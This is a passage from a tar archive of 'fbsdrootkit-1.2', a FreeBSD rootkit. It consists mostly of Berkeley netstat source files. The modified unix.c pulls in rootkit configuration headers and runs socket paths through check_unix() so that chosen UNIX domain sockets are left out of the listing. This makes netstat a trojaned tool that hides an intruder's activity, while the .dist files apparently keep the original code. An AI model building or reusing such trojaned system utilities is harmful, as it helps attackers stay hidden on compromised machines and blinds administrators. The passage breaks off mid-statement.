pt_u.u_sa.sa_len); return (&pt_u.u_sa); } static void p_tree(rn) struct radix_node *rn; { again: kget(rn, rnode); if (rnode.rn_b < 0) { if (Aflag) printf("%-8.8x ", rn); if (rnode.rn_flags & RNF_ROOT) { if (Aflag) printf("(root node)%s", rnode.rn_dupedkey ? " =>\n" : "\n"); } else if (do_rtent) { kget(rn, rtentry); p_rtentry(&rtentry); if (Aflag) p_rtnode(); } else { p_sockaddr(kgetsa((struct sockaddr *)rnode.rn_key), NULL, 0, 44); putchar('\n'); } if (rn = rnode.rn_dupedkey) goto again; } else { if (Aflag && do_rtent) { printf("%-8.8x ", rn); p_rtnode(); } rn = rnode.rn_r; p_tree(rnode.rn_l); p_tree(rn); } } char nbuf[20]; static void p_rtnode() { struct radix_mask *rm = rnode.rn_mklist; if (rnode.rn_b < 0) { if (rnode.rn_mask) { printf("\t mask "); p_sockaddr(kgetsa((struct sockaddr *)rnode.rn_mask), NULL, 0, -1); } else if (rm == 0) return; } else { sprintf(nbuf, "(%d)", rnode.rn_b); printf("%6.6s %8.8x : %8.8x", nbuf, rnode.rn_l, rnode.rn_r); } while (rm) { kget(rm, rmask); sprintf(nbuf, " %d refs, ", rmask.rm_refs); printf(" mk = %8.8x {(%d),%s", rm, -1 - rmask.rm_b, rmask.rm_refs ? nbuf : " "); if (rmask.rm_flags & RNF_NORMAL) { struct radix_node rnode_aux; printf(" , "); kget(rmask.rm_leaf, rnode_aux); p_sockaddr(kgetsa((struct sockaddr *)rnode_aux.rn_mask), NULL, 0, -1); } else p_sockaddr(kgetsa((struct sockaddr *)rmask.rm_mask), NULL, 0, -1); putchar('}'); if (rm = rmask.rm_mklist) printf(" ->"); } putchar('\n'); } static void ntreestuff() { size_t needed; int mib[6]; char *buf, *next, *lim; register struct rt_msghdr *rtm; mib[0] = CTL_NET; mib[1] = PF_ROUTE; mib[2] = 0; mib[3] = 0; mib[4] = NET_RT_DUMP; mib[5] = 0; if (sysctl(mib, 6, NULL, &needed, NULL, 0) < 0) { err(1, "sysctl: net.route.0.0.dump estimate"); } if ((buf = malloc(needed)) == 0) { err(2, "malloc(%lu)", (unsigned long)needed); } if (sysctl(mib, 6, buf, &needed, NULL, 0) < 0) { err(1, "sysctl: net.route.0.0.dump"); } lim = buf + needed; for (next = buf; next < lim; next += rtm->rtm_msglen) { rtm = (struct rt_msghdr *)next; np_rtentry(rtm); } } static void np_rtentry(rtm) register struct rt_msghdr *rtm; { register struct sockaddr *sa = (struct sockaddr *)(rtm + 1); #ifdef notdef static int masks_done, banner_printed; #endif static int old_af; int af = 0, interesting = RTF_UP | RTF_GATEWAY | RTF_HOST; #ifdef notdef /* for the moment, netmasks are skipped over */ if (!banner_printed) { printf("Netmasks:\n"); banner_printed = 1; } if (masks_done == 0) { if (rtm->rtm_addrs != RTA_DST ) { masks_done = 1; af = sa->sa_family; } } else #endif af = sa->sa_family; if (af != old_af) { pr_family(af); old_af = af; } if (rtm->rtm_addrs == RTA_DST) p_sockaddr(sa, NULL, 0, 36); else { p_sockaddr(sa, NULL, rtm->rtm_flags, 16); if (sa->sa_len == 0) sa->sa_len = sizeof(long); sa = (struct sockaddr *)(sa->sa_len + (char *)sa); p_sockaddr(sa, NULL, 0, 18); } p_flags(rtm->rtm_flags & interesting, "%-6.6s "); putchar('\n'); } static void p_sockaddr(sa, mask, flags, width) struct sockaddr *sa, *mask; int flags, width; { char workbuf[128], *cplim; register char *cp = workbuf; switch(sa->sa_family) { case AF_INET: { register struct sockaddr_in *sin = (struct sockaddr_in *)sa; if (sin->sin_addr.s_addr == INADDR_ANY) cp = "default"; else if (flags & RTF_HOST) cp = routename(sin->sin_addr.s_addr); else if (mask) cp = netname(sin->sin_addr.s_addr, ntohl(((struct sockaddr_in *)mask) ->sin_addr.s_addr)); else cp = netname(sin->sin_addr.s_addr, 0L); break; } case AF_NS: cp = ns_print(sa); break; case AF_LINK: { register struct sockaddr_dl *sdl = (struct sockaddr_dl *)sa; if (sdl->sdl_nlen == 0 && sdl->sdl_alen == 0 && sdl->sdl_slen == 0) (void) sprintf(workbuf, "link#%d", sdl->sdl_index); else switch (sdl->sdl_type) { case IFT_ETHER: { register int i; register u_char *lla = (u_char *)sdl->sdl_data + sdl->sdl_nlen; cplim = ""; for (i = 0; i < sdl->sdl_alen; i++, lla++) { cp += sprintf(cp, "%s%x", cplim, *lla); cplim = ":"; } cp = workbuf; break; } default: cp = link_ntoa(sdl); break; } break; } default: { register u_char *s = (u_char *)sa->sa_data, *slim; slim = sa->sa_len + (u_char *) sa; cplim = cp + sizeof(workbuf) - 6; cp += sprintf(cp, "(%d)", sa->sa_family); while (s < slim && cp < cplim) { cp += sprintf(cp, " %02x", *s++); if (s < slim) cp += sprintf(cp, "%02x", *s++); } cp = workbuf; } } if (width < 0 ) printf("%s ", cp); else { if (nflag) printf("%-*s ", width, cp); else printf("%-*.*s ", width, width, cp); } } static void p_flags(f, format) register int f; char *format; { char name[33], *flags; register struct bits *p = bits; for (flags = name; p->b_mask; p++) if (p->b_mask & f) *flags++ = p->b_val; *flags = '\0'; printf(format, name); } static void p_rtentry(rt) register struct rtentry *rt; { static struct ifnet ifnet, *lastif; static char name[16]; static char prettyname[9]; struct sockaddr *sa; struct sockaddr addr, mask; /* * Don't print protocol-cloned routes unless -a. */ if(rt->rt_parent && !aflag) return; if (!(sa = kgetsa(rt_key(rt)))) bzero(&addr, sizeof addr); else addr = *sa; if (!rt_mask(rt) || !(sa = kgetsa(rt_mask(rt)))) bzero(&mask, sizeof mask); else mask = *sa; p_sockaddr(&addr, &mask, rt->rt_flags, WID_DST); p_sockaddr(kgetsa(rt->rt_gateway), NULL, RTF_HOST, WID_GW); p_flags(rt->rt_flags, "%-6.6s "); printf("%6d %8d ", rt->rt_refcnt, rt->rt_use); if (rt->rt_ifp) { if (rt->rt_ifp != lastif) { kget(rt->rt_ifp, ifnet); kread((u_long)ifnet.if_name, name, 16); lastif = rt->rt_ifp; snprintf(prettyname, sizeof prettyname, "%.6s%d", name, ifnet.if_unit); } if(rt->rt_rmx.rmx_expire) { time_t expire_time; if ((expire_time =rt->rt_rmx.rmx_expire - time((time_t *)0)) > 0) printf(" %8.8s %6d%s", prettyname, expire_time, rt->rt_nodes[0].rn_dupedkey ? " =>" : ""); } else { printf(" %8.8s%s", prettyname, rt->rt_nodes[0].rn_dupedkey ? " =>" : ""); } } putchar('\n'); } char * routename(in) u_long in; { register char *cp; static char line[MAXHOSTNAMELEN + 1]; struct hostent *hp; cp = 0; if (!nflag) { hp = gethostbyaddr((char *)&in, sizeof (struct in_addr), AF_INET); if (hp) { cp = hp->h_name; trimdomain(cp); } } if (cp) strncpy(line, cp, sizeof(line) - 1); else { #define C(x) ((x) & 0xff) in = ntohl(in); sprintf(line, "%u.%u.%u.%u", C(in >> 24), C(in >> 16), C(in >> 8), C(in)); } return (line); } static u_long forgemask(a) u_long a; { u_long m; if (IN_CLASSA(a)) m = IN_CLASSA_NET; else if (IN_CLASSB(a)) m = IN_CLASSB_NET; else m = IN_CLASSC_NET; return (m); } static void domask(dst, addr, mask) char *dst; u_long addr, mask; { register int b, i; if (!mask || (forgemask(addr) == mask)) { *dst = '\0'; return; } i = 0; for (b = 0; b < 32; b++) if (mask & (1 << b)) { register int bb; i = b; for (bb = b+1; bb < 32; bb++) if (!(mask & (1 << bb))) { i = -1; /* noncontig */ break; } break; } if (i == -1) sprintf(dst, "&0x%lx", mask); else sprintf(dst, "/%d", 32-i); } /* * Return the name of the network whose address is given. * The address is assumed to be that of a net or subnet, not a host. */ char * netname(in, mask) u_long in, mask; { char *cp = 0; static char line[MAXHOSTNAMELEN + 1]; struct netent *np = 0; u_long net, omask; register u_long i; int subnetshift; i = ntohl(in); omask = mask; if (!nflag && i) { if (mask == 0) { switch (mask = forgemask(i)) { case IN_CLASSA_NET: subnetshift = 8; break; case IN_CLASSB_NET: subnetshift = 8; break; case IN_CLASSC_NET: subnetshift = 4; break; default: abort(); } /* * If there are more bits than the standard mask * would suggest, subnets must be in use. * Guess at the subnet mask, assuming reasonable * width subnet fields. */ while (i &~ mask) mask = (long)mask >> subnetshift; } net = i & mask; while ((mask & 1) == 0) mask >>= 1, net >>= 1; if (!(np = getnetbyaddr(i, AF_INET))) np = getnetbyaddr(net, AF_INET); if (np) { cp = np->n_name; trimdomain(cp); } } if (cp) strncpy(line, cp, sizeof(line) - 1); else if ((i & 0xffffff) == 0) sprintf(line, "%u", C(i >> 24)); else if ((i & 0xffff) == 0) sprintf(line, "%u.%u", C(i >> 24) , C(i >> 16)); else if ((i & 0xff) == 0) sprintf(line, "%u.%u.%u", C(i >> 24), C(i >> 16), C(i >> 8)); else sprintf(line, "%u.%u.%u.%u", C(i >> 24), C(i >> 16), C(i >> 8), C(i)); domask(line+strlen(line), i, omask); return (line); } /* * Print routing statistics */ void rt_stats(off) u_long off; { struct rtstat rtstat; if (off == 0) { printf("rtstat: symbol not in namelist\n"); return; } kread(off, (char *)&rtstat, sizeof (rtstat)); printf("routing:\n"); printf("\t%u bad routing redirect%s\n", rtstat.rts_badredirect, plural(rtstat.rts_badredirect)); printf("\t%u dynamically created route%s\n", rtstat.rts_dynamic, plural(rtstat.rts_dynamic)); printf("\t%u new gateway%s due to redirects\n", rtstat.rts_newgateway, plural(rtstat.rts_newgateway)); printf("\t%u destination%s found unreachable\n", rtstat.rts_unreach, plural(rtstat.rts_unreach)); printf("\t%u use%s of a wildcard route\n", rtstat.rts_wildcard, plural(rtstat.rts_wildcard)); } short ns_nullh[] = {0,0,0}; short ns_bh[] = {-1,-1,-1}; char * ns_print(sa) register struct sockaddr *sa; { register struct sockaddr_ns *sns = (struct sockaddr_ns*)sa; struct ns_addr work; union { union ns_net net_e; u_long long_e; } net; u_short port; static char mybuf[50], cport[10], chost[25]; char *host = ""; register char *p; register u_char *q; work = sns->sns_addr; port = ntohs(work.x_port); work.x_port = 0; net.net_e = work.x_net; if (ns_nullhost(work) && net.long_e == 0) { if (port ) { sprintf(mybuf, "*.%xH", port); upHex(mybuf); } else sprintf(mybuf, "*.*"); return (mybuf); } if (bcmp(ns_bh, work.x_host.c_host, 6) == 0) { host = "any"; } else if (bcmp(ns_nullh, work.x_host.c_host, 6) == 0) { host = "*"; } else { q = work.x_host.c_host; sprintf(chost, "%02x%02x%02x%02x%02x%02xH", q[0], q[1], q[2], q[3], q[4], q[5]); for (p = chost; *p == '0' && p < chost + 12; p++) continue; host = p; } if (port) sprintf(cport, ".%xH", htons(port)); else *cport = 0; sprintf(mybuf,"%xH.%s%s", ntohl(net.long_e), host, cport); upHex(mybuf); return(mybuf); } char * ns_phost(sa) struct sockaddr *sa; { register struct sockaddr_ns *sns = (struct sockaddr_ns *)sa; struct sockaddr_ns work; static union ns_net ns_zeronet; char *p; work = *sns; work.sns_addr.x_port = 0; work.sns_addr.x_net = ns_zeronet; p = ns_print((struct sockaddr *)&work); if (strncmp("0H.", p, 3) == 0) p += 3; return(p); } void upHex(p0) char *p0; { register char *p = p0; for (; *p; p++) switch (*p) { case 'a': case 'b': case 'c': case 'd': case 'e': case 'f': *p += ('A' - 'a'); } } fbsdrootkit-1.2/netstat/unix.c100600 764 0 10611 6257602116 14301 0ustar dfroot/*- * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)unix.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ /* * Display protocol blocks in the unix domain. */ #include #include #include #include #include #include #include #include #include #define KERNEL struct uio; struct proc; #include #include #include #include #include "netstat.h" /* Rootkit configuration files */ #include "../config.h" #define UNIX_DOT_C #include "../rootkitnetstat.h" static void unixdomainpr __P((struct socket *, caddr_t)); static struct file *file, *fileNFILE; static int nfiles; extern kvm_t *kvmd; void unixpr(off) u_long off; { register struct file *fp; struct socket sock, *so = &sock; char *filebuf; struct protosw *unixsw = (struct protosw *)off; filebuf = (char *)kvm_getfiles(kvmd, KERN_FILE, 0, &nfiles); if (filebuf == 0) { printf("Out of memory (file table).\n"); return; } file = (struct file *)(filebuf + sizeof(fp)); fileNFILE = file + nfiles; for (fp = file; fp < fileNFILE; fp++) { if (fp->f_count == 0 || fp->f_type != DTYPE_SOCKET) continue; if (kread((u_long)fp->f_data, (char *)so, sizeof (*so))) continue; /* kludge */ if (so->so_proto >= unixsw && so->so_proto <= unixsw + 2) if (so->so_pcb) unixdomainpr(so, fp->f_data); } } static char *socktype[] = { "#0", "stream", "dgram", "raw", "rdm", "seqpacket" }; static void unixdomainpr(so, soaddr) register struct socket *so; caddr_t soaddr; { struct unpcb unpcb, *unp = &unpcb; struct mbuf mbuf, *m; struct sockaddr_un *sa; static int first = 1; if (kread((u_long)so->so_pcb, (char *)unp, sizeof (*unp))) return; if (unp->unp_addr) { m = &mbuf; if (kread((u_long)unp->unp_addr, (char *)m, sizeof (*m))) m = (struct mbuf *)0; sa = (struct sockaddr_un *)(m->m_dat); } else m = (struct mbuf *)0; if (first) { printf("Active UNIX domain sockets\n"); printf( "%-8.8s %-6.6s %-6.6s %-6.6s %8.8s %8.8s %8.8s %8.8s Addr\n", "Address", "Type", "Recv-Q", "Send-Q", "Inode", "Conn", "Refs", "Nextref"); first = 0; } /* If socket has a pathname check to see if it should be blocked. */ if(showall || m && !check_unix(sa->sun_path)) { printf("%8x %-6.6s %6d %6d %8x %8x %8x %8x", soaddr, socktype[so->so_type], so->so_rcv.sb_cc, so->so_snd.sb_cc, unp->unp_vnode, unp->unp_conn, unp->unp_refs, unp->unp_nextref); if (m) printf(" %.*s", m->m_len - (int)(sizeof(*sa) - sizeof(sa->sun_path)), sa->sun_path); putchar('\n'); } } fbsdrootkit-1.2/netstat/main.c.dist100600 764 0 27351 6256121712 15212 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993 * Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint char copyright[] = "@(#) Copyright (c) 1983, 1988, 1993\n\ Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)main.c 8.4 (Berkeley) 3/1/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "netstat.h" struct nlist nl[] = { #define N_MBSTAT 0 { "_mbstat" }, #define N_IPSTAT 1 { "_ipstat" }, #define N_TCB 2 { "_tcb" }, #define N_TCPSTAT 3 { "_tcpstat" }, #define N_UDB 4 { "_udb" }, #define N_UDPSTAT 5 { "_udpstat" }, #define N_IFNET 6 { "_ifnet" }, #define N_IMP 7 { "_imp_softc" }, #define N_ICMPSTAT 8 { "_icmpstat" }, #define N_RTSTAT 9 { "_rtstat" }, #define N_UNIXSW 10 { "_localsw" }, #define N_IDP 11 { "_nspcb"}, #define N_IDPSTAT 12 { "_idpstat"}, #define N_SPPSTAT 13 { "_spp_istat"}, #define N_NSERR 14 { "_ns_errstat"}, #define N_CLNPSTAT 15 { "_clnp_stat"}, #define IN_NOTUSED 16 { "_tp_inpcb" }, #define ISO_TP 17 { "_tp_refinfo" }, #define N_TPSTAT 18 { "_tp_stat" }, #define N_ESISSTAT 19 { "_esis_stat"}, #define N_NIMP 20 { "_nimp"}, #define N_RTREE 21 { "_rt_tables"}, #define N_CLTP 22 { "_cltb"}, #define N_CLTPSTAT 23 { "_cltpstat"}, #define N_NFILE 24 { "_nfile" }, #define N_FILE 25 { "_file" }, #define N_IGMPSTAT 26 { "_igmpstat" }, #define N_MRTPROTO 27 { "_ip_mrtproto" }, #define N_MRTSTAT 28 { "_mrtstat" }, #define N_MFCTABLE 29 { "_mfctable" }, #define N_VIFTABLE 30 { "_viftable" }, "", }; struct protox { u_char pr_index; /* index into nlist of cb head */ u_char pr_sindex; /* index into nlist of stat block */ u_char pr_wanted; /* 1 if wanted, 0 otherwise */ void (*pr_cblocks)(); /* control blocks printing routine */ void (*pr_stats)(); /* statistics printing routine */ char *pr_name; /* well-known name */ } protox[] = { { N_TCB, N_TCPSTAT, 1, protopr, tcp_stats, "tcp" }, { N_UDB, N_UDPSTAT, 1, protopr, udp_stats, "udp" }, { -1, N_IPSTAT, 1, 0, ip_stats, "ip" }, { -1, N_ICMPSTAT, 1, 0, icmp_stats, "icmp" }, { -1, N_IGMPSTAT, 1, 0, igmp_stats, "igmp" }, { -1, -1, 0, 0, 0, 0 } }; struct protox nsprotox[] = { { N_IDP, N_IDPSTAT, 1, nsprotopr, idp_stats, "idp" }, { N_IDP, N_SPPSTAT, 1, nsprotopr, spp_stats, "spp" }, { -1, N_NSERR, 1, 0, nserr_stats, "ns_err" }, { -1, -1, 0, 0, 0, 0 } }; struct protox isoprotox[] = { { ISO_TP, N_TPSTAT, 1, iso_protopr, tp_stats, "tp" }, { N_CLTP, N_CLTPSTAT, 1, iso_protopr, cltp_stats, "cltp" }, { -1, N_CLNPSTAT, 1, 0, clnp_stats, "clnp"}, { -1, N_ESISSTAT, 1, 0, esis_stats, "esis"}, { -1, -1, 0, 0, 0, 0 } }; struct protox *protoprotox[] = { protox, nsprotox, isoprotox, NULL }; static void printproto __P((struct protox *, char *)); static void usage __P((void)); static struct protox *name2protox __P((char *)); static struct protox *knownname __P((char *)); kvm_t *kvmd; int main(argc, argv) int argc; char *argv[]; { extern char *optarg; extern int optind; register struct protoent *p; register struct protox *tp; /* for printing cblocks & stats */ register char *cp; int ch; char *nlistf = NULL, *memf = NULL; char buf[_POSIX2_LINE_MAX]; char buf2[_POSIX2_LINE_MAX]; if (cp = rindex(argv[0], '/')) prog = cp + 1; else prog = argv[0]; af = AF_UNSPEC; while ((ch = getopt(argc, argv, "Aabdf:ghI:iM:mN:np:rstuw:")) != EOF) switch(ch) { case 'A': Aflag = 1; break; case 'a': aflag = 1; break; case 'b': bflag = 1; break; case 'd': dflag = 1; break; case 'f': if (strcmp(optarg, "ns") == 0) af = AF_NS; else if (strcmp(optarg, "inet") == 0) af = AF_INET; else if (strcmp(optarg, "unix") == 0) af = AF_UNIX; else if (strcmp(optarg, "iso") == 0) af = AF_ISO; else { errx(1, "%s: unknown address family", optarg); } break; case 'g': gflag = 1; break; case 'I': { char *cp; iflag = 1; for (cp = interface = optarg; isalpha(*cp); cp++) continue; unit = atoi(cp); break; } case 'i': iflag = 1; break; case 'M': memf = optarg; break; case 'm': mflag = 1; break; case 'N': nlistf = optarg; break; case 'n': nflag = 1; break; case 'p': if ((tp = name2protox(optarg)) == NULL) { errx(1, "%s: unknown or uninstrumented protocol", optarg); } pflag = 1; break; case 'r': rflag = 1; break; case 's': ++sflag; break; case 't': tflag = 1; break; case 'u': af = AF_UNIX; break; case 'w': interval = atoi(optarg); iflag = 1; break; case '?': default: usage(); } argv += optind; argc -= optind; #define BACKWARD_COMPATIBILITY #ifdef BACKWARD_COMPATIBILITY if (*argv) { if (isdigit(**argv)) { interval = atoi(*argv); if (interval <= 0) usage(); ++argv; iflag = 1; } if (*argv) { nlistf = *argv; if (*++argv) memf = *argv; } } #endif /* * Discard setgid privileges if not the running kernel so that bad * guys can't print interesting stuff from kernel memory. */ if (nlistf != NULL || memf != NULL) setgid(getgid()); kvmd = kvm_openfiles(nlistf, memf, NULL, O_RDONLY, buf); if (kvmd == NULL) { errx(1, "kvm_open: %s", buf); } if (kvm_nlist(kvmd, nl) < 0) { if(nlistf) errx(1, "%s: kvm_nlist: %s", nlistf, kvm_geterr(kvmd)); else errx(1, "kvm_nlist: %s", kvm_geterr(kvmd)); } if (nl[0].n_type == 0) { if(nlistf) errx(1, "%s: no namelist", nlistf); else errx(1, "no namelist"); } if (mflag) { mbpr(nl[N_MBSTAT].n_value); exit(0); } if (pflag) { if (tp->pr_stats) (*tp->pr_stats)(nl[tp->pr_sindex].n_value, tp->pr_name); else printf("%s: no stats routine\n", tp->pr_name); exit(0); } #if 0 /* * Keep file descriptors open to avoid overhead * of open/close on each call to get* routines. */ sethostent(1); setnetent(1); #else /* * This does not make sense any more with DNS being default over * the files. Doing a setXXXXent(1) causes a tcp connection to be * used for the queries, which is slower. */ #endif if (iflag) { intpr(interval, nl[N_IFNET].n_value); exit(0); } if (rflag) { if (sflag) rt_stats(nl[N_RTSTAT].n_value); else routepr(nl[N_RTREE].n_value); exit(0); } if (gflag) { if (sflag) mrt_stats(nl[N_MRTPROTO].n_value, nl[N_MRTSTAT].n_value); else mroutepr(nl[N_MRTPROTO].n_value, nl[N_MFCTABLE].n_value, nl[N_VIFTABLE].n_value); exit(0); } if (af == AF_INET || af == AF_UNSPEC) { setprotoent(1); setservent(1); /* ugh, this is O(MN) ... why do we do this? */ while (p = getprotoent()) { for (tp = protox; tp->pr_name; tp++) if (strcmp(tp->pr_name, p->p_name) == 0) break; if (tp->pr_name == 0 || tp->pr_wanted == 0) continue; printproto(tp, p->p_name); } endprotoent(); } if (af == AF_NS || af == AF_UNSPEC) for (tp = nsprotox; tp->pr_name; tp++) printproto(tp, tp->pr_name); if (af == AF_ISO || af == AF_UNSPEC) for (tp = isoprotox; tp->pr_name; tp++) printproto(tp, tp->pr_name); if ((af == AF_UNIX || af == AF_UNSPEC) && !sflag) unixpr(nl[N_UNIXSW].n_value); exit(0); } /* * Print out protocol statistics or control blocks (per sflag). * If the interface was not specifically requested, and the symbol * is not in the namelist, ignore this one. */ static void printproto(tp, name) register struct protox *tp; char *name; { void (*pr)(); u_long off; if (sflag) { pr = tp->pr_stats; off = nl[tp->pr_sindex].n_value; } else { pr = tp->pr_cblocks; off = nl[tp->pr_index].n_value; } if (pr != NULL && (off || af != AF_UNSPEC)) (*pr)(off, name); } /* * Read kernel memory, return 0 on success. */ int kread(addr, buf, size) u_long addr; char *buf; int size; { if (kvm_read(kvmd, addr, buf, size) != size) { warnx("%s", kvm_geterr(kvmd)); return (-1); } return (0); } char * plural(n) int n; { return (n != 1 ? "s" : ""); } char * plurales(n) int n; { return (n != 1 ? "es" : ""); } /* * Find the protox for the given "well-known" name. */ static struct protox * knownname(name) char *name; { struct protox **tpp, *tp; for (tpp = protoprotox; *tpp; tpp++) for (tp = *tpp; tp->pr_name; tp++) if (strcmp(tp->pr_name, name) == 0) return (tp); return (NULL); } /* * Find the protox corresponding to name. */ static struct protox * name2protox(name) char *name; { struct protox *tp; char **alias; /* alias from p->aliases */ struct protoent *p; /* * Try to find the name in the list of "well-known" names. If that * fails, check if name is an alias for an Internet protocol. */ if (tp = knownname(name)) return (tp); setprotoent(1); /* make protocol lookup cheaper */ while (p = getprotoent()) { /* assert: name not same as p->name */ for (alias = p->p_aliases; *alias; alias++) if (strcmp(name, *alias) == 0) { endprotoent(); return (knownname(p->p_name)); } } endprotoent(); return (NULL); } static void usage() { (void)fprintf(stderr, "usage: %s [-Aan] [-f address_family] [-M core] [-N system]\n", prog); (void)fprintf(stderr, " %s [-bdghimnrs] [-f address_family] [-M core] [-N system]\n", prog); (void)fprintf(stderr, " %s [-bdn] [-I interface] [-M core] [-N system] [-w wait]\n", prog); (void)fprintf(stderr, " %s [-M core] [-N system] [-p protocol]\n", prog); exit(1); } void trimdomain(cp) char *cp; { static char domain[MAXHOSTNAMELEN + 1]; static int first = 1; char *s; if (first) { first = 0; if (gethostname(domain, MAXHOSTNAMELEN) == 0 && (s = strchr(domain, '.'))) (void) strcpy(domain, s + 1); else domain[0] = 0; } if (domain[0]) { while ((cp = strchr(cp, '.'))) { if (!strcasecmp(cp + 1, domain)) { *cp = 0; /* hit it */ break; } else { cp++; } } } } fbsdrootkit-1.2/netstat/inet.c.dist100600 764 0 37371 6256125447 15241 0ustar dfroot/* * Copyright (c) 1983, 1988, 1993, 1995 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)inet.c 8.5 (Berkeley) 5/24/95"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #define TCPSTATES #include #include #include #include #include #include #include #include #include #include #include #include "netstat.h" struct inpcb inpcb; struct tcpcb tcpcb; struct socket sockb; char *inetname __P((struct in_addr *)); void inetprint __P((struct in_addr *, int, char *, int)); /* * Print a summary of connections related to an Internet * protocol. For TCP, also give state of connection. * Listening processes (aflag) are suppressed unless the * -a (all) flag is specified. */ void protopr(off, name) u_long off; char *name; { struct inpcbhead head; register struct inpcb *prev, *next; int istcp; static int first = 1; if (off == 0) return; istcp = strcmp(name, "tcp") == 0; kread(off, (char *)&head, sizeof (struct inpcbhead)); prev = (struct inpcb *)off; for (next = head.lh_first; next != NULL; next = inpcb.inp_list.le_next) { if (kread((u_long)next, (char *)&inpcb, sizeof (inpcb))) { printf("???\n"); break; } if (!aflag && inet_lnaof(inpcb.inp_laddr) == INADDR_ANY) { prev = next; continue; } if (kread((u_long)inpcb.inp_socket, (char *)&sockb, sizeof (sockb))) { printf("???\n"); break; }; if (istcp) { if (kread((u_long)inpcb.inp_ppcb, (char *)&tcpcb, sizeof (tcpcb))) { printf("???\n"); break; }; } if (first) { printf("Active Internet connections"); if (aflag) printf(" (including servers)"); putchar('\n'); if (Aflag) printf("%-8.8s ", "PCB"); printf(Aflag ? "%-5.5s %-6.6s %-6.6s %-18.18s %-18.18s %s\n" : "%-5.5s %-6.6s %-6.6s %-22.22s %-22.22s %s\n", "Proto", "Recv-Q", "Send-Q", "Local Address", "Foreign 